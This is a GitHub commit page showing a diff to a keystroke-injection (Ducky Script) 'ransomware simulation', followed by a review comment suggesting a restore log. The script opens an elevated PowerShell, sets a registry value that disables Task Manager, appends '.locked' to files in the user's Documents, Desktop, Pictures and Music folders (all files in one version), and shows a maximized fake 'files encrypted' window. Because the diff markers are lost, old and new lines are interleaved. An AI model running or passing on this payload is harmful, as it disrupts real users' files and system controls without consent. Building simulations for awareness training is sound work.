Update 1. RansomwareSimulation

Mark
2024-05-14 16:05:39 -04:00
committed by GitHub
parent c1327e9b77
commit 13199e17f0
+10 -17
@@ -1,34 +1,27 @@
REM This script was created by github.com/MarkCyber
REM This script is intended to act as a simulation of a ransomware attack
REM This script will change file extensions to .locked rather than encrypting the files
REM This script will change all file extensions to .locked rather than encrypting the files
REM This script will also display a simulated encrypted message
DELAY 1000
DELAY 500
GUI r
DELAY 2000
DELAY 100
STRING powershell -Command "Start-Process powershell -Verb runAs"
ENTER
DELAY 2000
DELAY 500
ALT y
DELAY 2000
DELAY 500
REM Check for admin privileges and proceed with Task Manager disable attempt
STRING if(-NOT ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")) { exit }
REM Rename files in specified locations to append .locked to every file
STRING $locations = @('MyDocuments', 'Desktop', 'Pictures', 'Music'); $errorOccurred = $false; foreach ($loc in $locations) { $path = [Environment]::GetFolderPath($loc); $files = Get-ChildItem -Path $path -File; foreach ($file in $files) { $null = $file | Rename-Item -NewName {$file.Name + '.locked'}; if (-not $?){ $errorOccurred = $true } } }
STRING IF ($errorOccurred) { exit }
ENTER
STRING $regPath = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\System'; $regName = 'DisableTaskMgr'; Set-ItemProperty -Path $regPath -Name $regName -Value 1
ENTER
DELAY 2000
REM Rename files in specified locations
STRING $locations = @('MyDocuments', 'Desktop', 'Pictures', 'Music'); $errorOccurred = $false; foreach ($loc in $locations) { $path = [Environment]::GetFolderPath($loc); $files = Get-ChildItem -Path $path -File | Where-Object { $_.Extension -match '\.doc$|\.xls$|\.jpg$|\.png$|\.mp3$' }; foreach ($file in $files) { $null = $file | Rename-Item -NewName {$file.Name + '.locked'}; if (-not $?){ $errorOccurred = $true } } }
IF ($errorOccurred) { exit }
ENTER
DELAY 3000
DELAY 1000
REM Display ransomware message
STRING Add-Type -AssemblyName PresentationFramework; $Window = New-Object System.Windows.Window; $Window.WindowStartupLocation = 'CenterScreen'; $Window.WindowState = 'Maximized'; $Window.Topmost = $true; $Window.Content = 'Your files have been encrypted. This is a simulation. Please contact your IT support team.'; $Window.ShowDialog()
ENTER
DELAY 3000
DELAY 1000
STRING exit
ENTER
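Review bot: The rename step that reads `Get-ChildItem -Path $path -File` with no extension filter (presumably the new side, since the +/- markers are lost on this page) appends `.locked` to every file in Documents, Desktop, Pictures and Music, but the payload keeps no record of what it touched and ships no restore step. With everything in scope, a second run yields `.locked.locked`, and a partial failure leaves the folders in a mixed state that is hard to audit. I would skip files that are already renamed with `Get-ChildItem -Path $path -File | Where-Object { $_.Extension -ne '.locked' }`, and have the same line write the list of renamed paths to a file so that a companion restore script can reverse the exercise exactly. The comment `REM Check for admin privileges and proceed with Task Manager disable attempt` also looks stale if the `DisableTaskMgr` registry write is one of the removed lines; `REM Exit unless the PowerShell session is elevated` would match what the following STRING does.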